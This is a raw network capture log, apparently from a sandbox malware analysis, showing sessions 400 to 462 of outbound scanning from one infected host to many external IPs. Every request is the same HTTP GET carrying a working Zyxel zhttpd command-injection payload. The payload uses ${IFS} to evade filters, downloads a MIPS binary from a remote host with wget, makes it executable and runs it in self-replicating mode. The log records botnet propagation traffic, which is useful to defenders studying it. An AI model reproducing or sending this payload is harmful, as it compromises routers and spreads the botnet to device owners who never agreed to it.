                                        Jan 14, 2024 16:18:22.072676897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        400192.168.2.1335018131.39.207.18443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:22.072719097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        401192.168.2.1349144129.219.207.194443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:22.072779894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        402192.168.2.1349292160.104.103.165443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:22.072807074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        403192.168.2.1342632188.244.84.94443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:22.072860956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        404192.168.2.134880225.149.31.209443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:22.072948933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        405192.168.2.134066079.31.56.126443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:22.073000908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        406192.168.2.135295039.11.252.55443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:22.073031902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        407192.168.2.1334090169.123.20.72443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:22.073076963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        408192.168.2.134899264.225.167.111443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:22.073121071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        409192.168.2.133348225.208.170.142443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:22.073136091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        410192.168.2.1333034157.241.149.11443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:22.073388100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        411192.168.2.1356496188.125.195.164443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:22.073524952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        412192.168.2.1340410180.147.165.50443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:22.073575974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        413192.168.2.1353644164.172.172.28443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:23.078063011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        414192.168.2.133288819.19.240.130443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:23.078114033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        415192.168.2.1342198196.158.187.20443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:23.078180075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        416192.168.2.134141054.13.237.156443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:23.078218937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        417192.168.2.1336062148.233.114.243443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:24.082290888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        418192.168.2.1348186137.220.146.71443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:24.082330942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        419192.168.2.136074675.147.223.15443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:24.082360983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        420192.168.2.1334328206.52.220.125443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:24.082390070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        421192.168.2.1352042109.90.254.112443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:24.082427979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        422192.168.2.1338354207.117.1.168443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:24.082448959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        423192.168.2.134956650.165.112.182443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:24.082598925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        424192.168.2.135695672.42.21.82443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:24.082637072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        425192.168.2.1353346161.152.100.9443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:25.086441994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        426192.168.2.135940276.53.36.186443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:25.086476088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        427192.168.2.1344624123.209.117.106443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:25.086529970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        428192.168.2.133410669.90.171.38443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:25.086556911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        429192.168.2.135467451.113.23.202443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:25.086632013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        430192.168.2.1357516163.180.252.147443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:26.092607975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        431192.168.2.134194814.153.4.156443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:26.092660904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        432192.168.2.1341550131.79.179.95443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:26.092715979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        433192.168.2.133357882.34.64.183443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:27.095853090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        434192.168.2.1348868119.118.176.134443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:27.095918894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        435192.168.2.13555362.28.186.165443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:28.100168943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        436192.168.2.1336174133.159.180.184443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:28.100198030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        437192.168.2.1347196138.199.153.229443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:28.100248098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        438192.168.2.135789250.123.214.3443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:28.100287914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        439192.168.2.1339022163.129.86.236443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:28.100389957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        440192.168.2.135083244.199.104.212443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:29.104278088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        441192.168.2.1355628170.131.71.100443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:29.104330063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        442192.168.2.1359232219.1.43.197443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:29.104351044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        443192.168.2.135805065.235.230.40443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:29.104403019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        444192.168.2.134172259.1.182.179443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:29.104459047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        445192.168.2.1348286186.31.107.62443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:29.104549885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        446192.168.2.1356064223.146.234.200443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.116027117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        447192.168.2.1347958201.75.251.26443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.116080999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        448192.168.2.1348532153.249.15.234443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.116185904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        449192.168.2.1349702164.68.142.145443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.116185904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        450192.168.2.1356038137.103.39.187443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.116255999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        451192.168.2.1333330174.231.245.196443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.116300106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        452192.168.2.133637478.181.115.217443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.116359949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        453192.168.2.134856813.250.78.223443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.116400003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        454192.168.2.1354146197.121.112.134443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.116482973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        455192.168.2.134587061.229.239.247443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.116533041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        456192.168.2.1340346161.82.174.153443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.116589069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        457192.168.2.1343280106.255.248.91443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.116614103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        458192.168.2.1337250108.102.140.103443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.116676092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        459192.168.2.135195634.199.237.67443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.116748095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        460192.168.2.135523651.248.227.231443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.116776943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        461192.168.2.1346958180.86.99.4443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.116852999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        462192.168.2.135885286.68.216.115443
                                        TimestampBytes transferredDirectionData
